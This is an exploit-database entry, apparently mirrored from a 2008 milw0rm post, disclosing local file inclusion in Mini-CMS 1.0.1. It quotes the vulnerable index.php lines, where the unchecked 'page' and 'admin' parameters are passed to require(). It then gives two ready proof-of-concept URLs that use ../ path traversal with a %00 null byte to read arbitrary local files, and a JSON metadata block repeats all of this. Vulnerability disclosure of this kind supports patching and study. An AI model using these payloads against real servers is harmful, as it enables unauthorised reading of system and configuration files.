Search...

Mini-CMS 1.0.1 - index.php Local File Inclusion

2008-12-07T00:00:00

ID EXPLOITPACK:216E4DA2B5141C99B2AE71849230930A
Type exploitpack
Reporter cOndemned
Modified 2008-12-07T00:00:00

Description

Mini-CMS 1.0.1 - index.php Local File Inclusion

                                        
                                            /*

	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_cms.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	81.		require("page/" . $page . ".php");
	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	83.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	

It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... 
Maybe double fail ? x]
	
	
EoF

# milw0rm.com [2008-12-07]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:34", "references": [], "description": "\nMini-CMS 1.0.1 - index.php Local File Inclusion", "edition": 1, "reporter": "cOndemned", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2008-12-07T00:00:00", "title": "Mini-CMS 1.0.1 - index.php Local File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:34", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2020-04-01T19:04:34", "rev": 2}, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-12-07T00:00:00", "id": "EXPLOITPACK:216E4DA2B5141C99B2AE71849230930A", "href": "", "viewCount": 1, "sourceData": "/*\n\n\t$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $\n\t\n\tMini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities\n\tDiscovered by cOndemned\n\n\tDownload : http://www.bpowerhouse.info/mini_cms.htm\n\t\n\tGreetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*\n\n*/\n\nSource of index.php\n\n\t[...]\n\n\t9.\t$page = !empty($_GET['page']) ? $_GET['page'] : \"home\";\n\t10.\t$admin = !empty($_GET['admin']) ? $_GET['admin'] : \"\";\n\t\n\t[...]\n\t\n\t80.\tif (($page != \"\") && file_exists(\"page/\" . $page . \".php\")) {\n\t81.\t\trequire(\"page/\" . $page . \".php\");\n\t82.\t} else if (($admin != \"\") && file_exists(\"admin/\" . $admin . \".php\")) {\n\t83.\t\trequire(\"admin/\" . $admin . \".php\");\n\n\t[...]\n\t\n\nProof of Concept\n\n\thttp://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00\n\thttp://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00\n\t\n\nIt's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... \nMaybe double fail ? x]\n\t\n\t\nEoF\n\n# milw0rm.com [2008-12-07]", "cvss": {"score": 0.0, "vector": "NONE"}}